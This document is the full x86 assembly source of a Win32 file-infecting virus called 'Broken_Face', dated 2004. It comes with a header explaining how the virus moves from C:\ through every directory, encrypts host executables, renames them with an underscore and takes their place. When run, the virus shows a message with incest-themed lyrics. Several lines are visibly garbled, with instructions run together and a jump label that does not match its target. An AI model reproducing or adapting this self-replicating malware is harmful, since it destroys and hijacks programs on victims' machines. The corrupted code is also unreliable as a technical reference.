; ___________________
; | Win32.Broken_Face |
; | __________________ |
; ___________ ||
[Information]
First, Virus Moves to the root directory, and scans for
DirectoryS.it Enters the and checks for executables.if
; no files found or more files needed, the Looks in the
Current Directory for Another Subdir. if The isnt Any
; IT Goes Back and Enters Another Dir etc etc. Encrypts
Hostfiles (marked with _ in front of their name)
When ITS Time to Execute A Host, IT Decrypts It Into A
File Marked with $, Executes It, And Keeps Deleting IT
Until The File Exits So The Decrypted File Dissapears.
Sick Method, Could Not think of anything else, but it
Works Fine. Infected Hosts Keep The Original Size IF
They area smaller Than 8192 bytes.thats all. be Carefull
If you think of experimenting with it, spreads flaousst.
.386
.MODEL FLAT
.DATA
Fuck DD 0
SHIT DD 0
ftel DD?
TDATA DB 318 DUP (?)
Target DD?
NBYTES DD 0
NewHandle DD?
Depth DB 0
FileHandle DB 40 DUP (?)
Find_Data DB 3180 DUP (?)
XDATA DB 318 DUP (?)
FILES2EAT DB 0EH
XHANDLE DD 0
MSG DB "There Was this Boy", 0DH, "WHO Had Two Chlidren", 0DH
DB "with his sisters", 0DH, "They Were His Daughters", 0DH
DB "They Were His Favourite Lovers", 0DH, "I Got No Lips, I Got No Tounge"
DB 0DH, "WHERE THERE ERE EYES THERE'S Only Space", 0DH
DB "I Got No lips, I Got No Tounge", 0DH, "I Got A Broken Face!", 0
.code
EXTRN EXITPROCESS: PROC
EXTRN Messageboxa: Proc
EXTRN FINDFIRSTFILEA: PROC
EXTRN FINDNEXTFILEA: PROC
EXTRN SETCURRENTDIRECTORYA: PROC
EXTRN Deletefilea: Proc
EXTRN FINDCLOSE: PROC
EXTRN CREATEFILEA: PROC
EXTRN GETCURRENTDIRECTORYA: PROC
EXTRN READFILE: PROC
EXTRN WRITEFILE: Procextrn CloseHandle: Proc
EXTRN WINEXEC: PROC
EXTRN GETCOMMANDLINEA: PROC
EXTRN CREATEPROCESSA: PROC
Start:
SUB ESP, 1024
MOV EBP, ESP
Call getcommandlinea
INC EAX
MOV [ftel], EAX
LAOS:
CMP Byte Ptr [EAX], '"
Je Monday
INC EAX
JMP laos
MONDAY:
MOV BYTE PTR [EAX], 0
Mov DWORD PTR [fuck], EAX
Push offset root
Call setCurrentDirectorya
XOR ESI, ESI; for FIND_DATA
XOR EDI, EDI; For FileHandle
Find1stdir:
Lea Eax, [Find_Data ESI]
Push EAX
Push Offset Dirmasker
Call FindfirstFilea
Mov DWORD PTR [FileHandle EDI], EAX
CMP DWORD PTR [Find_Data ESI], 10h; Check IT IS A DIR
JNE FIND2NDDIR
CMP BYTE PTR [Find_Data ESI 44], "."
JE FIND2NDDIR
Getin:
Lea Eax, [Find_Data 44 ESI]
Push EAX
Call setCurrentDirectorya
Inc Byte Ptr [Depth]
Push Offset XData
Push Offset EXEFILE
Call FindfirstFilea
CMP EAX, -1
JNZ FNE1
DAM:
Add Edi, 4
Add ESI, 313
JMP Find1stdir
FNE1:
MOV BH, BYTE PTR [xData 43]
MOV [xhandle], EAX
JMP Infect
Fne2:
MOV Byte PTR [xData 43], BH
Push Offset XData
Mov eax, [xhandle]
Push EAX
Call FindnextFilea
OR EAX, EAX
JZ DAM
Infect:
CMP Byte PTR [xData 44], '_'
JE FNE2
MOV BH, BYTE PTR [xData 43]
MOV Byte PTR [xData 43], '_'
Push Offset TData
Push offset xData 43
Call FindfirstFilea
CMP EAX, -1
JNZ Fne
DMF:
XOR EDX, EDX
Push Edx
Push 2
Push 1
Push Edx
Push Edx
Push 40000000H
Push offset xData 43
Call Createfilea
CMP EAX, -1
Je end; failed. Back in the box :(
MOV [newHandle], EAX
XOR EDX, EDX
Push Edx
Push Edx
Push 3
Push Edx
Push Edx
Push 80000000H
Push Offset XData 44
Call Createfilea
MOV [Target], EAX
MOV BYTE PTR [shit], 66
Call CopyFile
Call fTopen
xor edx, edxpush edx
PUSH 80
Push 3
Push Edx
Push Edx
Push 40000000H
Push Offset XData 44
Call Createfilea
MOV [newHandle], EAX
Call CopyFile
JMP end
GetBack:
CMP Byte PTR [DEPTH], 0
Je Relend
Dec byte PTR [Depth]
Push DWORD PTR [EDI FileHandle]
Call FindClose
SUB ESI, 313
SUB EDI, 4
Push Offset CDBACK
Call setCurrentDirectorya
JMP FIND2NDDIR
Goroot:
XOR ESI, ESI
Mov EDI, ESI
MOV BYTE PTR [DEPTH], 0
Push offset root
Call setCurrentDirectorya; Move to C: /
Find2nddir:
Lea Eax, [Find_Data ESI]
Push EAX
Push DWORD PTR [FileHandle EDI]
Call FindnextFilea
OR EAX, EAX
JZ GetBack
CMP DWORD PTR [Find_Data ESI], 10h
JNE FIND2NDDIR
CMP BYTE PTR [Find_Data ESI 44], '.'
JE FIND2NDDIR
JMP Getin
End:
Dec byte PTR [files2eat]
CMP Byte Ptr [Files2eat], 0
JNE FNE2
Relend:
Call Dencrypt
Push 5
Push dword PTR [ftel]
Call Winexec
CMP EAX, 31
JG Fuckup
PUSH 0
Push Offset Tag 1
Push Offset MSG
PUSH 0
Call Messageboxa
JMP Deadend
Fuckup:
Push dword PTR [ftel]
Call Deletefilea
OR EAX, EAX
JZ Fuckup
Deadend:
PUSH 0
Call EXITPROCESS
Exefile db '* .exe', 0
Dirmasker db '*.', 0
Root db 'c: /', 0
CDBACK DB '..', 0
Tag DB '[Broken_Face', 0, 'Coded by Supermovah / Misp]'
CopyFile:
PUSH 0
Push offset nbytes
PUSH 1024
Push EBP
Mov Eax, [Target]
Push EAX
Call readfile
Mov Eax, [NBYTES]
OR EAX, EAX
JZ GBGB
CMP Byte PTR [Shit], 66
Je Encyost
BCK:
PUSH 0
Push offset nbytes
Push [NBYTES]
Push EBP
Mov Eax, [NewHandle]
Push EAX
Call writefile
JMP CopyFile
GBGB:
Push DWORD PTR [NewHandle]
Call Closehandle
Push DWORD PTR [Target]
Call Closehandle
MOV BYTE PTR [shit], 0
RET
ENCHOST:
PUSH ESI
MOV ESI, EBP
MOV ECX, 100HXOR BX, BX
ENCH:
Add BX, CX
XOR Word PTR [ESI], BX
Inc ESI
Inc ESI
Loop ench
POP ESI
MOV BYTE PTR [shit], 66
JMP BCK
DENCRYPT:
MOV ESI, DWORD PTR [fuck]
Tuesday:
CMP Byte PTR [ESI], '/'
Je Google
Dec ESI
Loop Tuesday
Google:
Inc ESI
MOV Al, Byte Ptr [ESI]
MOV BYTE PTR [ESI], '_'
Friday:
Inc ESI
MOV BL, BYTE PTR [ESI]
MOV BYTE PTR [ESI], Al
CMP Byte PTR [ESI], 0
JZ Sunday
Inc ESI
MOV Al, Byte Ptr [ESI]
MOV BYTE PTR [ESI], BL
CMP Byte PTR [ESI], 0
JNZ frIDay
Sunday:
Call fTopen
MOV ESI, DWORD PTR [ftel]
Ghho:
Inc ESI
CMP Byte Ptr [ESI], '_'
Jne Ghho
MOV BYTE PTR [ESI], '$'
XOR EDX, EDX
Push Edx
Push 2
Push 1
Push Edx
Push 1
Push 40000000H
Push dword PTR [ftel]
Call Createfilea
MOV [newHandle], EAX
MOV BYTE PTR [shit], 66
Call CopyFile
RET
FTOPEN:
XOR EDX, EDX
Push Edx
Push Edx
Push 3
Push Edx
Push 1
Push 80000000H
Push dword PTR [ftel]
Call Createfilea
MOV [Target], EAX
RET
End Start
; 2-9-2004
